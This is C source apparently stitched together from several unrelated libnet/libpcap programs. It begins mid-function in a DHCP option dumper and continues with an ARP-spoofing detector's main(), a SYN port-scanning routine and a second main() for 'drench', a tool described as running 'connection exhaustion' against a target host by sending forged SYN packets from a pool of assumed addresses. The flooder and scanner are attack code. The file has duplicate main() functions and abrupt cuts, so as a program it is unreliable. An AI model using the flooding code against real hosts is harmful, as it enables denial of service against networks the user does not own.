printf(" %16.16s : %s\n",
dot[entry].label,
libnet_addr2name4(*(uint32_t *)
(options + 2 + i),
LIBNET_DONT_RESOLVE));
}
break;
case 4:
printf(" Message type : ");
switch (dhcp_hdr->dhcp_opcode) {
case LIBNET_DHCP_MSGDISCOVER:
printf("discover\n");
break;
case LIBNET_DHCP_MSGOFFER:
printf("offer\n");
break;
case LIBNET_DHCP_MSGREQUEST:
printf("request\n");
break;
case LIBNET_DHCP_MSGDECLINE:
printf("decline\n");
break;
case LIBNET_DHCP_MSGACK:
printf("ack\n");
break;
case LIBNET_DHCP_MSGNACK:
printf("nack\n");
break;
case LIBNET_DHCP_MSGRELEASE:
printf("release\n");
break;
case LIBNET_DHCP_MSGINFORM:
printf("inform\n");
break;
}
break;
case 5:
printf(" %16.16s : %u seconds\n",
dot[entry].label,
ntohl(*(uint32_t *) (options + 2)));
break;
case 0:
default:
printf(" Option 0x%X : len %d\n",
*options, *(options + 1));
}
options += *(options + 1) + 2;
}
printf(" - end of dump -\n");
}
int
main (int argc, char **argv) {
int c, valid, bnr = 9, showpopup = 0, flags = 0; /* temporary vars */
char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
libnet_t *l; /* libnet handle for address retrieval */
char libnet_errbuf[LIBNET_ERRBUF_SIZE]; /* libnet error messages */
char start_time[24], end_time[24];
time_t acurtime, bcurtime;
struct tm *aloctime, *bloctime;
struct configuration conf, *config=&conf; /* struct to hold config for current session */
struct validated_queue *start = NULL, *end = NULL; /* pointers to validated queue */
/* get current system time */
acurtime = time (NULL);
/* convert it to local time representation */
aloctime = localtime (&acurtime);
/* format time struct into a char array */
strftime (start_time, 24, "%d/%b/%Y %H:%M:%S", aloctime);
/* load default params in config struct */
config->flags = 0;
config->verbose = 0;
config->queue_size = 0;
config->dev = NULL;
config->dport = HTTP;
config->mode = DETECT;
config->gtimeout = TIME_OUT;
config->scan_type = SYN_SCAN;
config->a_port_name = "HTTP";
config->a_scan_type = "SYN_SCAN";
/* parse and load cmd-line params in config struct */
while ((c = getopt (argc, argv, "hi:p:Parsfuetvg:o")) != -1) {
switch (c) {
case 'h':
print_usage ();
exit (EXIT_SUCCESS);
case 'i':
config->dev = optarg;
break;
case 'p':
if (1 <= atoi (optarg) && 65535 >= atoi (optarg)) {
config->dport = atoi (optarg);
}
break;
case 'P':
config->mode = PREVENT;
break;
case 'a':
config->scan_type = ACK_SCAN;
config->flags = config->flags | ACK;
flags = flags | ACK;
break;
case 'r':
config->scan_type = RST_SCAN;
config->flags = config->flags | RST;
flags = flags | RST;
break;
case 's':
config->scan_type = SYN_SCAN;
config->flags = config->flags | SYN;
flags = flags | SYN;
break;
case 'f':
config->scan_type = FIN_SCAN;
config->flags = config->flags | FIN;
flags = flags | FIN;
break;
case 'u':
config->scan_type = UDP_SCAN;
config->a_scan_type = "UDP_SCAN";
break;
case 'e':
config->scan_type = ECHO_SCAN;
config->a_scan_type = "ECHO_SCAN";
break;
case 't':
config->scan_type = TSTAMP_SCAN;
config->a_scan_type = "TSTAMP_SCAN";
break;
case 'v':
config->verbose = 1;
break;
case 'g':
if (1 <= atoi (optarg) && 9 >= atoi (optarg)) {
config->gtimeout = atoi (optarg);
}
break;
case 'o':
showpopup = 1;
break;
case '?':
if ('i' == optopt || 'p' == optopt) {
print_usage ();
exit (EXIT_FAILURE);
} else if (isprint (optopt)) {
printf ("\n [-] unknown option `-%c'\n", optopt);
print_usage ();
exit (EXIT_FAILURE);
} else {
printf ("\n unknown option character `\\x%x'\n", optopt);
print_usage ();
exit (EXIT_FAILURE);
}
default:
print_usage ();
exit (EXIT_FAILURE);
}
}
if (0 == flags) { config->flags = SYN; }
else if (ACK == flags) { config->a_scan_type = "ACK_SCAN"; }
else if (RST == flags) { config->a_scan_type = "RST_SCAN"; }
else if (SYN == flags) { config->a_scan_type = "SYN_SCAN"; }
else if (FIN == flags) { config->a_scan_type = "FIN_SCAN"; }
/* print an ASCII-ART banner */
print_banner ();
switch (config->dport) {
case HTTP:
config->a_port_name = "HTTP";
break;
case FTP:
config->a_port_name = "FTP";
break;
case TELNET:
config->a_port_name = "TELNET";
break;
case SSH:
config->a_port_name = "SSH";
break;
case SMTP:
config->a_port_name = "SMTP";
break;
default:
config->a_port_name = "UNKNOWN";
break;
}
/* check if we are root, else exit */
if (0 != getuid ()) {
printf ("\n [!] you need to be root buddy...\n\n");
exit (EXIT_FAILURE);
}
/* find a capture device if not specified on command-line */
if (config->dev == NULL) {
config->dev = pcap_lookupdev (errbuf);
if (config->dev == NULL) {
printf ("\n [-] could not find default device: %s\n\n", errbuf);
exit (EXIT_FAILURE);
}
}
/* initialize libnet library to find local mac and ip addresses */
l = libnet_init (LIBNET_LINK, config->dev, libnet_errbuf);
if (NULL == l) {
printf ("\n [-] libnet_init() failed: %s\n\n", libnet_errbuf);
exit (EXIT_FAILURE);
}
/* fetch local mac address */
config->macaddr = libnet_get_hwaddr (l);
if (NULL == config->macaddr) {
printf ("\n [-] could not fetch local mac address: %s\n\n", libnet_geterror (l));
libnet_destroy (l);
exit (EXIT_FAILURE);
} else {
snprintf (config->llmac, 18, "%02x:%02x:%02x:%02x:%02x:%02x",
config->macaddr->ether_addr_octet[0], config->macaddr->ether_addr_octet[1],
config->macaddr->ether_addr_octet[2], config->macaddr->ether_addr_octet[3],
config->macaddr->ether_addr_octet[4], config->macaddr->ether_addr_octet[5]);
}
/* fetch local ip address */
config->ipaddr = libnet_get_ipaddr4 (l);
if (-1 == config->ipaddr) {
printf ("\n [-] could not fetch local ip address: %s\n\n", libnet_geterror (l));
libnet_destroy (l);
exit (EXIT_FAILURE);
} else {
snprintf (config->llip, 16, "%s", libnet_addr2name4 (config->ipaddr, LIBNET_DONT_RESOLVE));
}
printf (" [+] session started at %s \n", start_time);
printf (" [+] default configuration and cmd-line parameters loaded\n");
printf (" [+] device: \"%s\", mode: \"%s\", port: \"%s\", scan-type: \"%s\"\n",
config->dev, (config->mode)? "PREVENT" : "DETECT", config->a_port_name, config->a_scan_type);
/* start repeat loop */
/* call sniffer module to fill up our config struct with packet fields */
printf (" [+] calling arp-sniffer module to capture incoming arp packets\n");
config = sniffer (config);
printf ("\n [+] above arp packet was captured and respective fields were saved for analysis\n");
printf (" [+] calling anamoly-detection module to perform static analysis on saved packet fields\n");
/* call static_analysis module to perform some static checks on packet fields */
valid = static_analysis (conf);
if (EXIT_FAILURE == valid) {
printf (" [+] analyzed arp packet seems to be specially-crafted. kernel might have added the"
" poisonous SIP-SMAC entry in arp cache\n");
if (DETECT == conf.mode) {
printf (" [+] you need to clean up arp cache manually. delete entry for SIP (%s) - SMAC (%s)\n",
conf.a_sip, conf.a_sha);
printf (" [+] to automate this process, please terminate this session and restart arp-secur"
" in PREVENT mode, i.e with -P switch\n");
} else if (PREVENT == conf.mode) {
printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n",
conf.a_sip, conf.a_sha);
cache_cleanup (conf.a_sip, conf.a_sha);
}
} else {
printf (" [+] analyzed arp packet does not seem to be specially-crafted\n");
/* check if we have already processed (and validated) the ip-mac pair... */
if (0 < conf.queue_size) {
printf (" [+] calling known-traffic-filter module to check if we have validated"
" IP - MAC (%s - %s) pair earlier (queue_size: %d)\n",
conf.a_sip, conf.a_sha, conf.queue_size);
known_traffic_filter (start, conf.a_sip, conf.a_sha, conf.queue_size);
} else {
printf (" [+] no IP-MAC pairs have been validated yet (queue_size: %d)\n", conf.queue_size);
}
/* ...hmmm, seems to be a new mac-ip pair. let's validate it then... */
printf (" [+] calling spoof-detection module to validate IP - MAC (%s - %s) pair\n", conf.a_sip, conf.a_sha);
valid = spoof_detector (conf, start, end);
if (0 == valid) {
printf ("\n [+] try other scan types before determining the validity of the IP - MAC (%s - %s)\n",
conf.a_sip, conf.a_sha);
if (DETECT == conf.mode) {
printf (" [+] for safety reasons, you need to clean up arp cache manually."
" delete entry for (%s - %s)\n", conf.a_sip, conf.a_sha);
printf (" [+] to automate this process from now onwards,"
" restart arp-secur in PREVENT mode, i.e with -P switch\n");
} else if (PREVENT == conf.mode) {
printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n",
conf.a_sip, conf.a_sha);
cache_cleanup (conf.a_sip, conf.a_sha);
}
}
/* display session summary in a system popup notification */
if (1 == showpopup) {
alert (conf.a_sip, conf.a_sha, valid);
}
/* end repeat loop */
/* end arp-secur session */
bcurtime = time (NULL);
bloctime = localtime (&bcurtime);
strftime (end_time, 24, "%d/%b/%Y %H:%M:%S", bloctime);
printf ("\n [+] session finished at %s\n\n", end_time);
}
return 0;
}//main
void sendsyns ()
{
libnet_t *l;
char errbuf[LIBNET_ERRBUF_SIZE];
u_long ip;
libnet_ptag_t tcp_pkt = LIBNET_PTAG_INITIALIZER;
libnet_ptag_t ip_pkt;
u_long dst_ip;
int count = 0;
char *payload = ""; // put your love note here.
u_short payload_s = strlen (payload);
int currentport = opts.low_port;
int build_header = 1;
/*
* pcap may be slow to initialize, so let's wait a second.
*/
sleep (1);
/*
* initialize libnet for raw IP packets. libnet will
* find an appropriate interface.
*/
l = libnet_init (LIBNET_RAW4, NULL, errbuf);
if (l == NULL) {
fprintf (stderr, "libnet_init failed: %s", errbuf);
exit (1);
}
/*
* get the IP address of the source interface
*/
ip = libnet_get_ipaddr4 (l);
if (-1 == ip) {
fprintf (stderr, "libnet_get_ipaddr4(l) failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
dst_ip = libnet_name2addr4 (l, (u_char *) opts.target, LIBNET_RESOLVE);
if (-1 == dst_ip) {
fprintf (stderr, "libnet_name2addr4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
/*
* Build and send a SYN packet, one for each port. The first time
* this loop is executed an IP packet will be constructed.
*/
printf ("scanning port %d through %d on %s\n",
opts.low_port,
opts.high_port, libnet_addr2name4 (dst_ip, LIBNET_DONT_RESOLVE));
while (currentport <= opts.high_port) {
/*
* Sleep a little... if we send packets too fast, some will get
* dropped.
*/
usleep (50);
/*
* Build the TCP packet with the SYN flag set. A payload is
* optional; for automated scans it is nice to include some text
* explaining why you are scanning (or ask first!). Fields with
* 0 will be calculated by libnet.
*/
tcp_pkt = libnet_build_tcp (opts.src_port, // source port
currentport++, // dest port
libnet_get_prand (LIBNET_PRu32), // seq
libnet_get_prand (LIBNET_PRu32), // ack
TH_SYN, // flags
libnet_get_prand (LIBNET_PRu16), // window size
0, // checksum
0, // urgent ptr
LIBNET_TCP_H + payload_s, // packet size
(u_char *) payload, // contents of packet
payload_s, // size of payload
l, // libnet handle
tcp_pkt); // libnet id
if (-1 == tcp_pkt) {
fprintf (stderr, "libnet_build_tcp() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
if (build_header) {
build_header = 0;
ip_pkt = libnet_autobuild_ipv4 (LIBNET_IPV4_H + LIBNET_TCP_H,
IPPROTO_TCP, dst_ip, l);
if (-1 == ip_pkt) {
fprintf (stderr, "libnet_autobuild_ipv4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
/*
* Send it!
*/
count = libnet_write (l);
if (-1 == count) {
fprintf (stderr, "libnet_write() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
printf ("\n");
}
int
main(int argc, char *argv[])
{
pkt_t *dp = NULL;
int ch = 0;
u_int32_t count = 5;
u_int32_t group = 0; /* number of packets to send in group */
useconds_t usec = 0; /* rate limit number of SYN's sent */
pid_t pid = 0;
/* pcap */
pcap_t *p = NULL;
char *dev = NULL;
char errbuf[PCAP_ERRBUF_SIZE];
u_int32_t localnet = 0;
u_int32_t netmask = 0;
struct bpf_program fcode;
char *filt = NULL;
/* libnet */
char lerrbuf[LIBNET_ERRBUF_SIZE];
(void)memset(errbuf, 0, PCAP_ERRBUF_SIZE);
(void)memset(lerrbuf, 0, LIBNET_ERRBUF_SIZE);
ISNULL(filt = (char *)calloc(MAXFILT, 1));
ISNULL(dp = (pkt_t *)calloc(1, sizeof(pkt_t)));
dp->p_tcp = LIBNET_PTAG_INITIALIZER;
dp->p_ip = LIBNET_PTAG_INITIALIZER;
dp->winsize = TCP_WINSIZE;
dp->opts |= O_CHKISN; /* check the ISN return in the ACK by default */
drench_exit = 0; /* global, signal exit from loop */
while ( (ch = getopt(argc, argv, "ACc:d:hi:p:P:Rr:s:S:x:")) != EOF) {
switch (ch) {
case 'A': /* Continue ACK'ing all ACK's */
dp->opts |= O_ACK;
break;
case 'C': /* Don't check the returned sequence number in the ACK */
dp->opts ^= O_CHKISN;
break;
case 'c': /* Number of packets to send */
count = (u_int32_t)atoi(optarg);
break;
case 'd': /* Destination address */
dp->daddr = optarg;
break;
case 'h': /* Help */
usage();
break;
case 'i': /* Use interface */
dev = optarg;
break;
case 'p': /* Destination port */
dp->dport = (in_port_t)atoi(optarg);
break;
case 'P':
dp->payload = optarg; /* Send data with the ACK */
break;
case 'r': /* Range of ip's to allocate */
dp->range = (u_int8_t)atoi(optarg);
break;
case 'R': /* Repeat the scan */
dp->opts |= O_REPEAT;
break;
case 's': /* Source address */
dp->saddr = strdup(optarg);
break;
case 'S': /* Sleep (microseconds) */
usec = (useconds_t)atoi(optarg);
break;
case 'x': /* Number of packets to send in group */
group = (u_int32_t)atoi(optarg);
break;
default:
usage();
break;
}
}
if (dp->daddr == NULL) {
(void)fprintf(stderr, "Must specify destination address.\n");
usage();
}
if (dp->dport == 0) {
(void)fprintf(stderr, "Must specify destination port.\n");
usage();
}
if (dp->range == 0)
dp->range = 1;
if (group == 0)
group = dp->range;
if (dev == NULL)
PCAP_ERRBUF(dev = pcap_lookupdev(errbuf));
/* libnet */
dp->l = libnet_init(LIBNET_RAW4, dev, lerrbuf);
if (dp->l == NULL)
errx(EXIT_FAILURE, "libnet_init: %s", lerrbuf);
if (dp->saddr == NULL) {
u_int32_t ipaddr = 0;
/* Assign the inital address. */
/* FIXME Simplisitically assign the address from
* FIXME our current address. Note this breaks for many
* FIXME conditions: if the host is multi-homed, if
* FIXME another host exists on the network with that IP,
* FIXME if the final octet rolls past 254, if the network
* FIXME is classless, IP aliases ...
*
* FIXME We can check for these conditions (check the ARP
* FIXME table, etc), but it is error prone. So just
* FIXME warn the user and hope for the best.
*/
if ( (ipaddr = libnet_get_ipaddr4(dp->l)) == -1)
errx(EXIT_FAILURE, "%s", libnet_geterror(dp->l));
dp->saddr = strdup(libnet_addr2name4(ipaddr, LIBNET_DONT_RESOLVE));
(void)fprintf(stdout, "[%s] WARNING: Source address not assigned.\n", __progname);
}
if (dp->range > 1) {
(void)fprintf(stdout, "[%s] WARNING: Assigning addresses sequentially from %s.\n", __progname,
dp->saddr);
(void)fprintf(stdout, "[%s] WARNING: This may cause problems on your network if addresses conflict with other hosts!\n", __progname);
}
LIBNET_ERR(libnet_seed_prand(dp->l));
dp->secret = libnet_get_prand(LIBNET_PRu32);
/* pcap */
(void)fprintf(stdout, "[%s] Connection exhaustion started.\n", __progname);
(void)fprintf(stdout, "[%s] Using device: %s\n", __progname, dev);
(void)snprintf(filt, MAXFILT, PCAP_FILT, dp->daddr, dp->dport);
(void)fprintf(stdout, "[%s] Using filter: %s\n", __progname, filt);
PCAP_ERRBUF(p = pcap_open_live(dev, SNAPLEN, PROMISC, TIMEOUT, errbuf));
if (pcap_lookupnet(dev, &localnet, &netmask, errbuf) == -1)
errx(EXIT_FAILURE, "%s\n", errbuf);
PCAP_ERR(pcap_compile(p, &fcode, filt, 1 /* optimize == true */, netmask));
PCAP_ERR(pcap_setfilter(p, &fcode));
switch (pcap_datalink(p)) {
case DLT_IEEE802_11:
(void)fprintf(stderr, "[%s] Link layer is 802.11\n", __progname);
break;
case DLT_EN10MB:
(void)fprintf(stderr, "[%s] Link layer is ethernet\n", __progname);
break;
default:
(void)fprintf(stderr, "[%s] Link layer is unsupported\n", __progname);
break;
}
if (create_arp_pool1(dp) < 0)
warnx("Could not create ARP pool");
(void)signal(SIGHUP, drench_cleanup);
(void)signal(SIGQUIT, drench_cleanup);
(void)signal(SIGINT, drench_cleanup);
(void)signal(SIGTERM, drench_cleanup);
if ( (pid = fork()) == -1)
err(EXIT_FAILURE, "fork");
/* begin by sending SYN packets */
if (pid == 0)
drench_writer(dp, count, group, usec);
drench_reader(dp, p);
(void)destroy_arp_pool1(dp);
libnet_destroy(dp->l);
free(dp->saddr);
free(dp);
exit (EXIT_FAILURE);
}
